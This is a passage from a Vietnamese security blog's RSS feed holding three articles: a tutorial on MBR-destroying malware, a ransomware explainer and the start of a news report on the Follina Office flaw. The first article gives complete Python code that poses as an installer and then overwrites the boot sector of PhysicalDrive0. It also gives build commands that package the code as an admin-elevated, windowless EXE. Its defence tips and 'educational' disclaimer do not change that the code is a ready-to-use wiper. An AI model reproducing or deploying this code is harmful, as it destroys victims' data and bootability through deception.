<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/carbon-2.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 29" width="1506" height="462" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 52"></p>
<p>&nbsp;</p>
<p>với đoạn code bên dưới sử dụng hàm <code>WriteFile()</code> của Windows API để ghi dữ liệu được lưu trong biến <code>ma_doc</code> (chứa mã độc MBR) vào ổ đĩa vật lý đã được mở file handle (<code>anonyviet</code>). Tiếp đến là hàm <code>CloseHandle()</code>  hàm này đóng file handle (<code>anonyviet</code>) đã được mở trước đó. Việc đóng file handle giúp giải phóng tài nguyên và ngăn chặn việc các tiến trình khác ghi vào thiết bị.</p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2023/02/carbon-3-1.png" alt="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 30" width="832" height="432" title="Code phá hủy MBR ổ cứng - Tấn công và phòng chống 53"></p>
<p>Nói nôm na là chương trình này yêu cầu người dùng bấm Yes để tiếp tục cài đặt, sau đó dừng nghỉ trong 3 giây và hiển thị một thông báo yêu cầu khởi động lại máy tính để cập nhật phần mềm. Sau khi người dùng khởi động lại máy tính, chương trình ghi dữ liệu vào phần MBR của ổ đĩa vật lý đầu tiên trên hệ thống. Và đó chính là mã độc MBR</p>
<p>Đây là đoạn code Python hoàn thiện:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="python">from win32file import * 
from win32api import *  
from win32gui import *  
from win32con import *  
from win32ui import *  
from time import sleep


ma_doc = bytes([
     # paste đoạn code dữ liệu hex tại đây
    0xE8, 0x15, 0x00, 0xBB, 0x27, 0x7C, 0x8A, 0x07, 0x3C, 0x00, 0x74, 0x0B, 0xE8, 0x03, 0x00, 0x43, 0xEB, 0xF4, 
    0xB4, 0x0E, 0xCD, 0x10, 0xC3, 0xC3, 0xB4, 0x07, 0xB0, 0x00, 0xB7, 0x02, 0xB9, 0x00, 0x00, 0xBA, 0x4F, 0x18, 
    0xCD, 0x10, 0xC3, 0x57, 0x65, 0x20, 0x61, 0x72, 0x65, 0x20, 0x41, 0x6E, 0x6F, 0x6E, 0x79, 0x76, 0x69, 0x65, 
    0x74, 0x2E, 0x63, 0x6F, 0x6D, 0x2C, 0x20, 0x49, 0x20, 0x61, 0x6D, 0x20, 0x48, 0x65, 0x76, 0x69, 0x6E, 0x0D, 
    0x0A, 0x59, 0x6F, 0x75, 0x20, 0x68, 0x61, 0x76, 0x65, 0x20, 0x62, 0x65, 0x65, 0x6E, 0x20, 0x68, 0x61, 0x63, 
    0x6B, 0x65, 0x64, 0x20, 0x21, 0x0D, 0x0A, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
    0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
])

def run_mbr():
    while MessageBox('Bấm "Yes để tiếp tục cài đặt" ', 'Anonyviet',MB_YESNO) == IDNO:
            continue
    sleep(3)
    if MessageBox('Đã cài đặt hoàn tất \nVui lòng khởi động lại máy để phần mềm được làm mới !', "Anonyviet"):
        pass

    anonyviet = CreateFileW(r"\\.\PhysicalDrive0", 
                          GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, 
                          None, OPEN_EXISTING, 0, 0)

    WriteFile(anonyviet, ma_doc, None)
    CloseHandle(anonyviet)

run_mbr()</pre>
<p>Để build được file Python sang EXE ( file exe này phải chạy với quyền admin nhen ) mình sẽ sử dụng <strong>Pyinstaller</strong> hoặc là <strong>Nuitka</strong> để build ra phần mềm chứa mã độc mbr:</p>
<p><code>pyinstaller --onefile --uac-admin -w FileMaDocMBRcuaBan.py</code></p>
<p><code>nuitka --onefile --windows-uac-admin --mingw64 --disable-console FileMaDocMBRcuaBan.py</code></p>
<p><strong> Và đây là kết quả !</strong></p>
<div style="width: 1364px;" class="wp-video"><!--[if lt IE 9]><script>document.createElement('video');</script><![endif]--><br />
<video class="wp-video-shortcode" id="video-45229-1" width="1364" height="768" preload="metadata" controls="controls"><source type="video/mp4" src="https://anonyviet.com/wp-content/uploads/2023/02/videodemo.mp4?_=1" /><a href="https://anonyviet.com/wp-content/uploads/2023/02/videodemo.mp4">https://anonyviet.com/wp-content/uploads/2023/02/videodemo.mp4</a></video></div>
<h2><span style="font-size: 18pt; color: #0000ff;"><strong>Cách phòng chống mã độc MBR:</strong></span></h2>
<ol>
<li>Sử dụng phần mềm diệt virus và cập nhật thường xuyên: Cài đặt phần mềm diệt virus trên máy tính của bạn và cập nhật thường xuyên để bảo vệ máy tính của bạn khỏi các mã độc MBR mới nhất.</li>
<li>Không tải xuống và cài đặt phần mềm từ các nguồn không rõ nguồn gốc: Tránh tải xuống và cài đặt phần mềm từ các trang web không rõ nguồn gốc, vì chúng có thể chứa mã độc MBR.</li>
<li>Không mở email hoặc tải xuống các tập tin từ các nguồn không rõ nguồn gốc: Mở email và tải xuống tập tin từ các nguồn không rõ nguồn gốc có thể dẫn đến sự lây lan của mã độc MBR</li>
<li>Sử dụng Firewall: Cài đặt tường lửa (Firewall) để bảo vệ máy tính của bạn khỏi các cuộc tấn công mạng.</li>
<li>Sử dụng phần mềm Anti-Rootkit: Cài đặt phần mềm Anti-Rootkit, nó sẽ giúp phát hiện và loại bỏ mã độc MBR.</li>
<li>Sử dụng mật khẩu truy cập: Sử dụng mật khẩu để bảo vệ BIOS và MBR khỏi các tấn công truy cập trái phép.</li>
<li>Không để ổ đĩa cứng trống trải: Nếu ổ đĩa cứng của bạn trống trải, các hacker có thể sử dụng để lưu trữ mã độc MBR.</li>
<li>Sử dụng phần mềm Backup: Sử dụng phần mềm Backup để sao lưu dữ liệu quan trọng và ổ đĩa cứng, nếu có bất kỳ điều gì xảy ra thì bạn có thể phục hồi lại dữ liệu của mình.</li>
</ol>
<p><span style="font-size: 18pt; color: #0000ff;"><strong>Cách giải quyết khi bị nhiễm mã độc MBR trên Windows</strong></span></p>
<p><strong>Bước 1</strong>: Tải bộ cài đặt Windows từ trang web của Microsoft. Bạn có thể tải về bản cài đặt tương ứng với phiên bản Windows bạn muốn cài đặt, ví dụ như Windows 10.</p>
<p><strong>Bước 2</strong>: Tạo một đĩa hoặc USB khởi động từ bộ cài đặt Windows bạn vừa tải về. Bạn có thể sử dụng một phần mềm tạo USB khởi động như Rufus để thực hiện việc này.</p>
<p><strong>Bước 3</strong>: Chọn thiết bị khởi động từ đĩa hoặc USB mà bạn đã tạo ở bước trên. Để làm điều này, bạn cần truy cập vào BIOS hoặc UEFI firmware và thay đổi thiết lập khởi động.</p>
<p><strong>Bước 4</strong>: Khởi động máy tính từ đĩa hoặc USB khởi động. Sau khi khởi động, bạn sẽ thấy màn hình cài đặt Windows.</p>
<p><strong>Bước 5</strong>: Làm theo các hướng dẫn trên màn hình để cài đặt Windows. Bạn có thể chọn loại cài đặt tùy chỉnh để xóa toàn bộ dữ liệu trên ổ cứng.</p>
<p><strong>Bước 6</strong>: Khi quá trình cài đặt hoàn tất, bạn cần cài đặt các trình điều khiển và các ứng dụng mà bạn sử dụng thường xuyên. Bạn có thể tải chúng từ trang web của nhà sản xuất hoặc từ Microsoft Store.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>MBR là gì và tại sao nó lại dễ bị tấn công?</h3>
<p>MBR (Master Boot Record) là 512 byte đầu tiên trên ổ cứng, chứa thông tin về phân vùng và mã khởi động.  Do vị trí quan trọng và cấu trúc tương đối đơn giản, MBR dễ bị tấn công bởi mã độc, dẫn đến lỗi khởi động hoặc mất dữ liệu.</p>
<h3>Việc tạo mã độc MBR có mục đích gì trong bài viết này?</h3>
<p>Bài viết này nhằm mục đích giáo dục và nghiên cứu về an ninh mạng, không khuyến khích việc tạo hoặc sử dụng mã độc.  Việc trình bày cách tạo mã độc giúp người đọc hiểu rõ hơn về cách thức hoạt động của các cuộc tấn công và biện pháp phòng ngừa.</p>
<h3>Làm thế nào để bảo vệ máy tính khỏi mã độc tấn công MBR?</h3>
<p>Cần thường xuyên sao lưu dữ liệu quan trọng, sử dụng phần mềm diệt virus cập nhật, và giữ cho hệ điều hành và phần mềm luôn được cập nhật bản vá bảo mật.  Sử dụng các công cụ kiểm tra và sửa chữa MBR nếu nghi ngờ bị nhiễm mã độc.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/code-pha-huy-mbr-o-cung-tan-cong-va-phong-chong/feed/</wfw:commentRss>
			<slash:comments>4</slash:comments>
		
		<enclosure url="https://anonyviet.com/wp-content/uploads/2023/02/videodemo.mp4" length="1923161" type="video/mp4" />
<enclosure url="https://anonyviet.com/wp-content/uploads/2023/02/videodemo.mp4?_=1" length="1923161" type="video/mp4" />

			</item>
		<item>
		<title>Ransomware là gì?</title>
		<link>https://anonyviet.com/ransomware-la-gi/</link>
					<comments>https://anonyviet.com/ransomware-la-gi/#respond</comments>
		
		<dc:creator><![CDATA[Dark Sniffer]]></dc:creator>
		<pubDate>Fri, 15 Jul 2022 09:23:30 +0000</pubDate>
				<category><![CDATA[Virus-Trojan-Rat]]></category>
		<category><![CDATA[mã độc]]></category>
		<category><![CDATA[ransomware]]></category>
		<category><![CDATA[virus]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=34219</guid>

					<description><![CDATA[Ransomware là một loại phần mềm độc hại chặn người dùng khỏi hệ thống máy tính và mã hóa tệp của họ, cho phép kẻ tấn công kiểm soát mọi thông tin cá nhân được lưu trữ trên thiết bị của nạn nhân. Tội phạm mạng sau đó sẽ dùng dữ liệu nhạy cảm của [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Ransomware là một loại phần mềm độc hại chặn người dùng khỏi hệ thống máy tính và mã hóa tệp của họ, cho phép kẻ tấn công kiểm soát mọi thông tin cá nhân được lưu trữ trên thiết bị của nạn nhân. Tội phạm mạng sau đó sẽ dùng dữ liệu nhạy cảm của nạn nhân để đe dọa cho đến khi đòi được tiền chuộc. Vậy nên mới có cái tên “ransom” (tiền chuộc) trong ransomware.</strong></p>
<p><img decoding="async" class="aligncenter  size-full" src="https://anonyviet.com/wp-content/uploads/2021/09/what-is-ransomware-hero.jpg" alt="Ransomware là gì?" width="533" height="300" title="Ransomware là gì? 55"></p>
<h2>Ransomware hoạt động như thế nào?</h2>
<p>Đặc điểm nổi bật của ransomware là nó được sử dụng như một công cụ tống tiền và có nhiều cách khác nhau để tội phạm mạng sử dụng loại phần mềm độc hại này để giành quyền truy cập vào thiết bị của nạn nhân. Một trong những cách phổ biến nhất là email lừa đảo — nạn nhân được gửi email có đính kèm file độc hại và sẽ lây nhiễm vào máy tính của nạn nhân khi chúng được mở.</p>
<p>Sau khi chiếm đoạt thành công máy tính của nạn nhân, những kẻ tấn công tiếp tục mã hóa một số hoặc tất cả các tệp của người dùng, như tài liệu Word, PDF, hình ảnh, cơ sở dữ liệu,&#8230; Phần mềm tống tiền cũng có thể khai thác toàn bộ lỗ hổng mạng, có thể lây lan sang các hệ thống khác và thậm chí trên toàn bộ tổ chức.</p>
<p>Vào cuối cuộc tấn công, tin tặc sẽ gửi cho nạn nhân một tin nhắn giải thích rằng các tệp của họ hiện đã bị mã hóa và chỉ có thể được giải mã nếu trả tiền chuộc. Tiền chuộc thường được yêu cầu dưới hình thức thanh toán Bitcoin không theo dõi được để trả cho kẻ tấn công.</p>
<h2>Mục tiêu của Ransomware?</h2>
<p>Mục tiêu ransomware có thể là người tiêu dùng cá nhân, các doanh nghiệp vừa và nhỏ hoặc các tổ chức doanh nghiệp lớn hơn. Việc bọn tội phạm chọn mục tiêu như thế nào thường phụ thuộc vào cơ hội. Ví dụ: họ có thể nhắm đến các nhóm có đội bảo mật nhỏ hơn như các trường đại học do khả năng bảo mật yếu hơn và mức độ chia sẻ tệp cao.</p>
<p>Một mục tiêu phổ biến khác là các tổ chức có nhiều khả năng trả tiền chuộc trong thời gian ngắn hơn. Các cơ quan chính phủ, ngân hàng, công ty luật và cơ sở y tế đều thuộc loại này, vì họ có thể cần quyền truy cập ngay lập tức vào các tệp khách hàng nhạy cảm và sẽ sẵn sàng trả tiền chuộc hơn nếu đổi lại sự im lặng về các vi phạm tài chính của tổ chức đó.</p>
<p>Cuối cùng, tội phạm thường nhắm mục tiêu vào các tổ chức công ty lớn với hy vọng kiếm được nhiều tiền hơn. Các cuộc tấn công ransomware trong danh mục này thường tập trung vào các doanh nghiệp ở Anh, Hoa Kỳ và Canada do số lượng sử dụng máy tính cá nhân cao.</p>
<h2>Các loại Ransomware</h2>
<p>Trong khi có vô số chủng loại ransomware, hầu hết các cuộc tấn công thuộc hai loại chính: Crypto ransomware và locker ransomware.</p>
<ul>
<li><strong>Crypto ransomware</strong> hoạt động bằng cách mã hóa các tệp máy tính nhạy cảm của nạn nhân và yêu cầu tiền chuộc trước khi có thể khôi phục tệp.</li>
<li><strong>Locker ransomware</strong> không mã hóa các tập tin. Thay vào đó, nó xâm phạm các chức năng máy tính cơ bản và khóa nạn nhân hoàn toàn khỏi thiết bị của họ cho đến khi trả tiền chuộc.</li>
</ul>
<p>Mức độ nghiêm trọng do một cuộc tấn công ransomware gây ra sẽ phụ thuộc vào biến thể của ransomware đang được sử dụng và các phương pháp giải quyết sẽ khác nhau tùy thuộc vào loại ransomware.</p>
<h2 class="TnITTtw-tpart TnITTtw-t">Ví dụ về ransomware</h2>
<p>Mặc dù ransomware chỉ mới xuất hiện được vài thập kỷ, nhưng nó đã có những bước phát triển nhanh chóng trong 5 năm qua nhờ sự tiến bộ của các phương thức thanh toán không thể theo dõi như Bitcoin. Dưới đây là một số vụ tấn công kinh khủng nhất từ trước đến nay.</p>
<h3>1. CryptoLocker</h3>
<p><a href="https://ladigi.vn/cryptolocker-la-gi-chi-tiet-ve-cryptolocker-moi-nhat-2021" target="_blank" rel="noopener">CryptoLocker</a> là một trong những cuộc tấn công ransomware trên diện rộng đầu tiên sử dụng mã hóa khóa công khai. Cuộc tấn công năm vào 2013 này đã đặt nền móng cho ransomware hiện tại và đã xâm nhập hơn 500.000 máy từ năm 2013 đến năm 2014. Thanh toán được yêu cầu trả dưới dạng Bitcoin và vào thời điểm đó, các chuyên gia tin rằng phần mềm độc hại đang được sử dụng là không thể xâm nhập.</p>
<p>Đến năm 2014, một công ty bảo mật cuối cùng cũng có quyền truy cập vào một máy chủ liên quan đến cuộc tấn công và khôi phục thành công các khóa mã hóa, nhưng những kẻ tấn công vẫn cố gắng tống tiền gần 3 triệu USD trước khi chúng phá sản.</p>
<h3>2.WannaCry</h3>
<p>WannaCry là một cuộc tấn công năm 2017, lây lan trên 150 quốc gia nhằm vào các lỗ hổng bảo mật trong phần mềm Windows. Cuộc tấn công đã lây nhiễm cho 230.000 thiết bị trên toàn thế giới, khóa người dùng khỏi máy tính của họ cho đến khi trả tiền chuộc bằng Bitcoin.</p>
<p>Cuộc tấn công WannaCry hoạt động bằng cách khai thác một lỗ hổng hệ điều hành được phát hiện là đã xuất hiện từ rất lâu trước khi cuộc tấn công xảy ra và sự kiện này đã làm sáng tỏ hệ thống bảo mật lỗi thời. Trên toàn cầu, WannaCry gây ra thiệt hại tài chính trung bình 4 tỷ USD.</p>
<h3>3. NotPetya</h3>
<p>NotPetya là một cuộc tấn công toàn cầu năm 2017 chủ yếu nhắm vào Ukraine. Ban đầu, nó được cho là một dòng Petya ransomware mới &#8211; một dạng phần mềm độc hại lây nhiễm vào máy tính mục tiêu, mã hóa dữ liệu và đòi tiền chuộc bằng bitcoin để khôi phục tệp. Tuy nhiên, NotPetya sau đó được coi là một dòng ransomware hoàn toàn mới được gọi là wiper, với mục đích duy nhất là phá hủy dữ liệu bị xâm phạm thay vì trả lại để đòi tiền chuộc.</p>
<h3>4. BadRabbit</h3>
<p>BadRabbit là một dòng ransomware đã lây nhiễm cho các công ty truyền thông trên khắp nước Nga và Đông Âu vào năm 2019. Cuộc tấn công được thực hiện thông qua việc phát tán bản cập nhật Adobe Flash giả mạo để lây nhiễm thiết bị của nạn nhân khi tải xuống, hướng họ đến trang thanh toán nơi đòi tiền chuộc bằng Bitcoin. Không giống như cuộc tấn công NotPetya, BadRabbit sẽ giải mã file nếu nhận được khoản tiền chuộc.</p>
<h2>Cách bảo vệ bản thân khỏi Ransomware</h2>
<p>Như với bất kỳ mối đe dọa an ninh mạng nào, các phương pháp phòng ngừa hầu như luôn tốt hơn là tìm cách chữa trị khi đã quá muộn. Thực hiện theo các phương pháp phòng ngừa tốt nhất dưới đây để giảm thiểu nguy cơ bị tấn công.</p>
<ul>
<li><strong>Sao lưu dữ liệu:</strong> Cách tốt nhất để tránh bị mã hóa các tệp nhạy cảm là sao lưu dữ liệu định kỳ. Tốt nhất là thực hiện việc này trên đám mây hoặc bằng ổ cứng ngoài. Nếu bạn gặp phải một cuộc tấn công, bạn chỉ cần xóa thiết bị của mình và cài đặt lại các tệp bằng bản sao lưu đó.</li>
<li><strong>Bảo vệ email:</strong> các chiến dịch lừa đảo qua email là một trong những phương tiện phổ biến nhất để phát tán ransomware, vì vậy việc bảo mật email của bạn là rất quan trọng. Ở cấp độ tổ chức, việc trang bị cho nhân viên của bạn khả năng nhận ra các email đáng ngờ có thể ngăn chặn một cuộc tấn công trước khi nó có thể gây ra bất kỳ thiệt hại nào.</li>
<li><strong>Luôn cập nhật hệ thống:</strong> Thường xuyên cập nhật phần mềm của bạn là một trong những cách đơn giản nhất để ngăn chặn bất kỳ cuộc tấn công mạng nào. Mỗi bản cập nhật phần mềm có sẵn đều giảm thiểu các lỗ hổng bảo mật mới được tìm thấy, khiến những kẻ tấn công khó khai thác phần mềm lỗi thời hơn.</li>
<li><strong>Không bao giờ nhấp vào các liên kết đáng ngờ:</strong> Cho dù đó là tệp đính kèm trong email hay một liên kết được tìm thấy trên web, đừng bao giờ nhấp vào các liên kết trong thư rác hoặc các trang web không xác định. Chỉ cần nhấp vào một liên kết độc hại cũng có thể bắt đầu quá trình tải xuống tự động, lây nhiễm vào máy tính của bạn ngay lập tức.</li>
<li><strong>Không tiết lộ thông tin cá nhân:</strong> Không bao giờ trả lời email hoặc tin nhắn văn bản từ một nguồn không xác định yêu cầu thông tin cá nhân, ngay cả khi họ tự nhận là người mà bạn tin tưởng.</li>
<li><strong>Sử dụng phần mềm bảo mật:</strong> Cài đặt phần mềm bảo mật đáng tin cậy là một trong những cách dễ nhất để giữ an toàn cho dữ liệu của bạn. Để tăng cường khả năng bảo vệ, hãy chọn một phần mềm cung cấp nhiều hơn các tính năng chống virus— một số có khả năng phát hiện mối đe dọa đa nền tảng có thể giữ an toàn cho tất cả các thiết bị của bạn.</li>
</ul>
<h2>Cách đối phó với các cuộc tấn công bằng Ransomware</h2>
<p>Nếu bạn đã bị tấn công bằng ransomware, thì thời gian là điều cốt yếu và điều quan trọng nhất là phải hành động càng nhanh càng tốt. Bạn có thể thực hiện một số bước để giảm thiểu thiệt hại.</p>
<ul>
<li><strong>Cách ly thiết bị bị nhiễm virus:</strong> Để đảm bảo an toàn cho mạng, bộ nhớ dùng chung và các thiết bị khác của bạn, quan trọng là bạn phải ngắt kết nối thiết bị bị ảnh hưởng khỏi mạng càng sớm càng tốt. Điều này có thể ngăn các thiết bị được kết nối khác bị nhiễm virus.</li>
<li><strong>Đánh giá tất cả các thiết bị được kết nối khác:</strong> Việc cô lập thiết bị bị nhiễm không phải lúc nào cũng đảm bảo rằng phần mềm tống tiền không tồn tại ở nơi khác trên mạng của bạn. Để ngăn nó lây lan, hãy kiểm tra tất cả các thiết bị được kết nối khác và ngắt kết nối bất kỳ thiết bị nào đang hoạt động đáng ngờ.</li>
<li><strong>Báo cáo với cơ quan chức năng:</strong> Ransomware là một loại tội phạm giống như bất kỳ loại tội phạm nào khác cần được báo cáo cho cơ quan thực thi pháp luật. Các nhà chức trách liên quan cũng có quyền truy cập vào các công cụ để truy xuất dữ liệu bị đánh cắp và xác định vị trí của những kẻ tấn công.</li>
</ul>
<h2>Ransomware có thể bị loại bỏ không?</h2>
<p>Việc loại bỏ ransomware tùy thuộc vào loại ransomware mà bạn đang xử lý và bạn sẽ cần phải cài đặt phần mềm bảo mật trước khi bị tấn công — nhưng trong một số trường hợp, bạn có thể xóa được. Đây là những gì bạn có thể làm:</p>
<ul>
<li>Ngắt kết nối thiết bị bị nhiễm khỏi Internet càng sớm càng tốt để ngăn phần mềm tống tiền phát tán.</li>
<li>Quét các tệp độc hại và xóa chúng bằng phần mềm bảo mật. Nếu ransomware khóa màn hình máy tính, thì có thể không thực hiện được.</li>
<li>Lấy lại quyền truy cập vào dữ liệu của bạn bằng công cụ giải mã được kết nối với phần mềm bảo mật. Bước này sẽ phụ thuộc vào phần mềm bảo mật bạn có.</li>
<li>Khôi phục các tệp đã mất của bạn nếu bạn có bản sao lưu dữ liệu bên ngoài.</li>
</ul>
<p>Nếu bạn không thể thực hiện các bước trên, tùy chọn còn lại duy nhất là đặt lại máy tính của bạn về cài đặt gốc. Bạn có thể <a href="https://anonyviet.com/cach-tao-usb-reset-password-windows-10/">đọc bài viết này</a> để biết cách reset win bằng usb.</p>
<p>Ransomware gây ra mối đe dọa đáng kể cho người tiêu dùng cũng như các công ty, và những kẻ tấn công đang thực hiện các cuộc tấn công ngày càng tinh vi khi công nghệ tiến bộ. Khi nói đến việc bảo vệ bản thân, phòng ngừa hầu như luôn tốt hơn là tìm cách chữa sau cuộc tấn công — điều này có nghĩa là giáo dục bản thân về ransomware và cách sử dụng thiết bị một cách an toàn là điều cần thiết để ngăn chặn mọi cuộc tấn công. Để tăng cường bảo mật, hãy đảm bảo có phần mềm chống virus trên tất cả các thiết bị của bạn để giảm nguy cơ lây nhiễm.</p>
<h2>Câu hỏi thường gặp</h2>
<h3>Ransomware là gì và nó hoạt động như thế nào?</h3>
<p>Ransomware là phần mềm độc hại mã hóa tệp của bạn, khóa bạn khỏi hệ thống, và đòi tiền chuộc để giải mã.  Nó thường lây lan qua email lừa đảo hoặc các liên kết độc hại.</p>
<h3>Tôi có thể bị ảnh hưởng bởi ransomware như thế nào?</h3>
<p>Bạn có thể bị nhiễm ransomware bằng cách mở tệp đính kèm email độc hại, nhấp vào liên kết độc hại, hoặc thông qua các lỗ hổng bảo mật trong phần mềm của bạn.</p>
<h3>Làm thế nào để tôi bảo vệ mình khỏi ransomware?</h3>
<p>Sao lưu dữ liệu thường xuyên, cập nhật phần mềm, sử dụng phần mềm diệt virus, và tránh nhấp vào các liên kết hoặc tệp đính kèm đáng ngờ là những bước quan trọng để bảo vệ mình.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/ransomware-la-gi/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cảnh giác thủ đoạn đính kèm Virus vào File Word mới nhất 2022</title>
		<link>https://anonyviet.com/canh-giac-thu-doan-dinh-kem-virus-vao-file-word-moi-nhat-2022/</link>
					<comments>https://anonyviet.com/canh-giac-thu-doan-dinh-kem-virus-vao-file-word-moi-nhat-2022/#comments</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 31 May 2022 08:00:40 +0000</pubDate>
				<category><![CDATA[Tin tức]]></category>
		<category><![CDATA[mã độc]]></category>
		<category><![CDATA[PoC]]></category>
		<category><![CDATA[virus]]></category>
		<category><![CDATA[Word]]></category>
		<category><![CDATA[word độc hại]]></category>
		<category><![CDATA[đính kèm virus vào file word]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=41840</guid>

					<description><![CDATA[Vào ngày 30/5/2022, chuyên gia an ninh mạng John Hammond đã công bố đoạn video khai thác lỗ hổng qua tính năng Preview (xem trước) của Windows đối với các file Word có thể kích hoạt mã độc được đính kèm. Hiện nay tuy chưa có có CVE nhưng đã cách thực hiện đã công [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Vào ngày 30/5/2022, chuyên gia an ninh mạng John Hammond đã công bố đoạn video khai thác lỗ hổng qua tính năng Preview (xem trước) của Windows đối với các file Word có thể kích hoạt mã độc được đính kèm. Hiện nay tuy chưa có có CVE nhưng đã cách thực hiện đã công bố công khai.</strong></p>
<p>Có thể nói đây là lỗ hổng zero-day trong Microsoft Office vì hiện nay chưa có bản vá, các Hacker đang tích cực khai thác trong các tài liệu Word đính kèm mã độc để thực thi mã từ xa trên PC của nạn nhân.</p>
<p>Lỗ hổng được đặt tên là &#8220;Follina&#8221;, được dùng để khai thác cách các sản phẩm Office hoạt động với MSDT (Công cụ chẩn đoán lỗi của Microsoft), lỗ hổng này có thể được khai thác ngay cả khi macro bị vô hiệu hóa trong Microsoft Office.</p>
<p>Theo một số thông tin, lỗ hổng ban đầu đã được báo cáo cho nhóm bảo mật của Microsoft vào ngày 12 tháng 4 năm 2022, sau khi các File Word giả mạo hãng thông tấn Sputnik của Nga phát tán đến người dùng.</p>
<p>9 ngày sau, Microsoft đã quyết định rằng lỗ hổng này không liên quan đến bảo mật nên không giải quyết. Thật đáng tiếc, đó dường như là một quyết định sai lầm của đội ngũ bảo mật của Microsoft. Nhà nghiên cứu bảo mật Kevin Beaumont báo cáo lỗ hổng này hoạt động trên các phiên bản mới nhất của Microsoft Office, ngay cả khi đã được cập nhật phiên bản mới nhất.</p>
<p>Lỗ hổng &#8220;Follina&#8221; được đưa ra ánh sáng sau khi một nhóm nghiên cứu an ninh mạng độc lập có tên <strong>nao_sec</strong> phát hiện ra một tài liệu Word (&#8220;<a href="https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection" rel="noopener">05-2022-0438.doc</a>&#8220;) được tải lên VirusTotal từ một địa chỉ IP ở Belarus.</p>
